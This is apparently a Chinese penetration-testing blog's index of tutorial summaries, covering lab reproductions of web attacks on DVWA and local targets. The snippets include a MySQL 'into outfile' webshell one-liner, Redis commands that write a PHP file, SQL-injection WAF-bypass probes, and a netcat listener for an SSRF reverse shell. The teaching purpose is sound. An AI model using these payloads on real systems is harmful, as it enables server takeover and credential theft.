web 渗透
小小秋叶
信息时代化,安全你我他
展开
-
关于SRC漏洞挖掘的经验
交流Q群:876554035前言国家在注重安全行业,越来越多的SRC(安全响应中心)成立。在各大平台,比如漏洞盒子,补天,360众测等等都纷纷成立了安全响应中心,许多的企业在上面入驻,给白帽子们提供了一个很好的平台,避免了黑客利用漏洞而造成损失。一. 资产收集在挖掘SRC中,我们首先要做的就是确认资产。通常情况下,企业SRC会在项目里给出域名或者域名的范围。我们可以利用一些工具来收集子域名...原创 2020-02-19 11:14:45 · 4991 阅读 · 2 评论 -
【WEB攻防】图片木马的利用
交流Q群:876554035一,图片木马原理图片木马以文件上传漏洞为基本条件,将可执行的脚本写入到图片中去,再利用文件包含漏洞来执行图片中的一句话木马,从而获取目标服务器权限。二.工具及环境DVWA靶场环境010Editor中国菜刀三.具体步骤1.登陆DVWA靶场,调整安全级别为high,进入到File Upload页面。图一 登陆界面图二 选择安全级别,进入2.利用01...原创 2020-02-15 11:51:22 · 10746 阅读 · 7 评论 -
某waf实战SQL注入绕过fuzz过程
QQ交流群:876554035#01 环境简介服务器:windows2008 R2软件:phpstudy20180211php 5.4.45mysql 5.5.53某锁win_3.1.18.13服务端版本#02 Fuzz过程以基于union注入为例fuzz order by过程如下:?id=1’ order --+ 不拦截?id=1’ order by --+ 拦截n...原创 2020-02-11 11:18:51 · 654 阅读 · 0 评论 -
【Web攻防】XSS Cookie劫持实例
QQ交流群:811401950一. XSS cookie劫持原理Cookie中一般加密保存了当前用户的登陆凭证。Cookie如果丢失,往往意味着用户的登陆凭证丢失。换句话说,攻击者可以不通过密码,而直接登陆进用户账户。二.工具及环境① DVWA靶场环境② Hackbar火狐组件③ Windows7 虚拟机(存放收集cookie信息的php脚本文件)三.具体步骤登陆DVWA靶场,...原创 2020-02-05 11:00:31 · 1238 阅读 · 0 评论 -
SQLMAP获取后台账号密码
QQ交流学习群:811401950一. SQLmapSQLMap是一个自动化注入工具,其主要功能是扫描、发现并利用给定的URL的SQL注入漏洞,内置了很多绕过插件。支持的数据库Mysql、Oracle、SQL Server等众多数据库。二. 常见注入类型ü 布尔类型盲注,即可以根据返回页面判断条件真假的注入ü 基于时间的盲注,即不能根据返回页面的内容判断任何信息,要用条件语句查看时间的延...原创 2020-01-16 12:08:30 · 5659 阅读 · 2 评论 -
PHP大马后门分析
QQ交流群:811401950一. PHP大马PHP大马,用php写的木马文件,一般自带提权,操作数据库,反弹shell,文件下载,端口扫描等功能。网上很多地方都能下载到这些木马,但是大部门大马都会自带有后门,也就是当你上传木马到别人的服务器上的时候,该大马的制作者同样会通过后门获得服务器的权限。今天就来分析一波该大马中的后门。二. 分析大马文件打开下载的php大马,可以看出该大马是...原创 2020-01-08 11:20:10 · 3031 阅读 · 1 评论 -
phpmyadmin通过日志写入一句话木马
QQ交流群:8765540351.想通过into outfile写入一句话木马select ‘<?php assert($_POST[“cmd”];?)>’ into outfile ‘D:/phpstudy/PHPTutorial/WWW/xx.php’;需要知道绝对路径2.执行下来,报错 “MySQL服务器正在使用–secure-file-priv选项运行,因此它无法执行此...原创 2019-12-26 11:39:41 · 4403 阅读 · 0 评论 -
Discuz-3.1 ssrf漏洞利用操作
QQ交流群:876554035#001 环境搭建:List itemPhpstudy+win7搭建discuz漏洞环境把Discuz-3.1 源码拖到网站根目录,然后访问upload目录进行安装,根据提示即可安装完成访问一波:#002 漏洞复现:Centos7,临时关闭防火墙开启nc监听6666端口:nc -lvp 6666查看centos7的ip利用discuz的漏...原创 2019-12-21 11:37:30 · 1305 阅读 · 1 评论 -
基于locate函数的的时间盲注
QQ交流群:8765540351.在盲注中,字符串截取函数我们一般使用substr或者substring(两者一样),但是还有一个冷门函数locate函数可以截取实现盲注。2.那么我们先来了解这个函数的用法,locate(substr,str,pos) 返回子串 substr 在字符串 str 中的第 pos 位置后第一次出现的位置。如果 substr 不在 str 中返回 0。看下图。...原创 2019-12-18 15:32:43 · 234 阅读 · 0 评论 -
Discuz-ssrf利用计划任务反弹shell
QQ交流群:811401950#001 环境搭建:Centos7(安装有apache,php,mysql,redis)利用winscp把discuz的源码拖到var/www/html目录下:chmod -R 777 upload/ 改一下权限然后访问192.168.136.133/upload进行安装,但是访问的时候愣是给我提示目录不存在,并且相关文件不可写但是查看...原创 2019-12-17 11:14:18 · 307 阅读 · 0 评论 -
Sql注入+代码执行getshell
QQ交流群:811401950一. 利用手段l 前台sql注入l 后台php代码执行二. 环境l Kali linux 若干工具l 本地靶机三. 步骤由于是本地搭建的靶机,先找一下ip地址,netdiscover一下,排除本机kali地址,那么135应该就是靶机地址了。Namp扫描一下开放的端口与服务开了80口,先访问试试(靶机名称叫DC-8,vuln上的),页...原创 2019-12-13 13:13:40 · 485 阅读 · 1 评论 -
Apache Solr远程代码执行漏洞 (CVE-2019-0193)复现操作
QQ交流学习群:811401950一. 漏洞描述2019年11月16日,Apache官方发布Apache Solr远程代码执行漏洞(CVE-2019-0193)安全通告,此漏洞存在于可选模块DataImportHandler 中,DataImportHandler是用于从数据库或其他源提取数据的常用模块,该模块中所有DIH配置都可以通过外部请求的dataConfig参 数来设置,由于DIH配置...原创 2019-12-11 13:38:46 · 665 阅读 · 0 评论 -
Redis未授权访问漏洞的利用
web渗透学习交流群:811401950利用redis写webshell在redis-cli中写入以下命令:config set dir /var/www/html/config set dbfilename redis.phpset webshell “<?php phpinfo(); ?>”save然后看一下目录下是否生成了一个redis.php的文件可以看到...原创 2019-12-09 20:34:19 · 195 阅读 · 0 评论